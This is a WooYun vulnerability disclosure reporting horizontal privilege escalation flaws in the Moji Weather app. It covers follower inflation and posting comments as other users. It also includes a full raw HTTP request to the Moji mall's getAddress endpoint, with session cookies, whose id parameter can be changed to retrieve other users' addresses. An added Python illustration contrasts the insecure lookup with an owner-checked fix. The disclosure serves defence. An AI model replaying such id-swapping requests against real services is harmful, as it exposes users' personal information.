
Vulnerability summary

Defect ID: wooyun-2015-0156805

Title: Moji Weather app: multiple horizontal privilege escalation issues (user information leakage)

Vendor: mojichina.com

Author: getshell1993

Submitted: 2015-11-30 11:47

Fixed: 2016-01-15 17:54

Published: 2016-01-15 17:54

Vulnerability type: Design flaw / logic error

Severity: High

Self-assessed Rank: 15

Status: Confirmed by vendor

Source: http://www.wooyun.org; for questions or help, contact [email protected]



Vulnerability details

Disclosure status:

2015-11-30: Details sent to the vendor, awaiting vendor handling
2015-12-01: Vendor confirmed; details disclosed to the vendor only
2015-12-11: Details disclosed to core white hats and domain experts
2015-12-21: Details disclosed to regular white hats
2015-12-31: Details disclosed to intern white hats
2016-01-15: Details disclosed to the public

Brief description:

Multiple horizontal privilege escalation issues (insecure direct object references)

Detailed description:

There are quite a few issues; several are listed here.

[screenshot: moji01.png]

When following a friend, swapping the id in the URL lets anyone inflate follower counts.

[screenshot: moji03.png]

Anywhere a comment can be posted, the id can be replaced with another user's.

[screenshot: moji02.png]

Picked an arbitrary user id and posted a comment as that user.

[screenshot: moji04.png]

Next, the Moji mall.

[screenshot: moji05.png]


POST /address/getAddress HTTP/1.1
Host: mall.moji.com
Accept-Language: zh-cn
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 7_0_4 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Mobile/11B554a mojii/50050700
X-Requested-With: XMLHttpRequest
Accept: application/json
Referer: http://mall.moji.com/address/list/25776298/myshop/0
Content-Type: application/x-www-form-urlencoded
Connection: keep-alive
Cookie: 719=%7B%22buy_way%22%3A%220%22%2C%22way_id%22%3A%220%22%7D; county=%E4%B8%9C%E5%9F%8E%E5%8C%BA; goods_id=719; Hm_lpvt_4bd2403ae3a05b9a989b28908b95bef5=1448776360; Hm_lvt_4bd2403ae3a05b9a989b28908b95bef5=1448775098; moji_sessionid=AES517075706473424D6D516C664C6459746530717662513D3D; snsid=25776298; PHPSESSID=eav5ogbjgb32fq18cthj8mn2e3
Proxy-Connection: keep-alive
Content-Length: 8
Origin: http://mall.moji.com
Accept-Encoding: gzip, deflate
id=58583
Changing the id in the body returns another user's address information.
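The mall request above is a textbook insecure direct object reference: the server fetches an address by the client-supplied id and never checks who owns it. As an added illustration that is not code from the report or from Moji, the following Python model shows such a handler in its insecure form beside a hardened one that scopes the lookup to the authenticated user; the session store, address table and ids are constructed placeholders.

```python
import json
from urllib.parse import parse_qs

# Constructed sample address table (placeholder ids and values, not real users).
ADDRESSES = {
    58582: {"id": 58582, "user_id": 25228138, "consignee": "user-a", "mobile": "138xxxx0001"},
    58583: {"id": 58583, "user_id": 25776298, "consignee": "user-b", "mobile": "139xxxx0002"},
}

# Constructed server-side session store: opaque session id -> authenticated user id.
SESSIONS = {"sess-b": 25776298}


def lookup_insecure(session_user_id, address_id):
    # Bug modelled on the report: the record is fetched by the client-supplied id alone,
    # so the session user is ignored and any existing id is returned.
    return ADDRESSES.get(address_id)


def lookup_secure(session_user_id, address_id):
    # Fix: filter by the authenticated owner as well as the id. A foreign id and a
    # non-existent id both yield None, so the response does not reveal which it was.
    rec = ADDRESSES.get(address_id)
    return rec if rec is not None and rec["user_id"] == session_user_id else None


def handle_get_address(session_id, body, lookup=lookup_secure):
    """Model of POST /address/getAddress with a body of the form 'id=<n>'.

    Returns (status, JSON text). The user identity comes only from the server-side
    session; a client-readable cookie such as snsid is never treated as proof of identity.
    """
    user_id = SESSIONS.get(session_id)
    if user_id is None:
        return 401, json.dumps({"error": "login required"})
    try:
        address_id = int(parse_qs(body).get("id", [""])[0])
    except ValueError:
        return 400, json.dumps({"error": "bad id"})
    rec = lookup(user_id, address_id)
    if rec is None:
        return 404, json.dumps({"error": "not found"})
    return 200, json.dumps({"data": rec})
```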

Proof of vulnerability:

Detailed information on tens of thousands of users is exposed; a few records are picked out here as proof.



Fix recommendation:

Enforce authorization: check that the requested object belongs to the current user.

Copyright notice: when reposting, please credit the source: getshell1993@WooYun


Vulnerability response

Vendor response:

Severity: Medium

Vulnerability Rank: 6

Confirmed: 2015-12-01 17:52

Vendor reply:

The issue in the attention (follow) feature does exist, and it is one we already knew about; we have begun working on a fix. The mall issue was disclosed and fixed previously. Thanks for the reminder.

Latest status:

None yet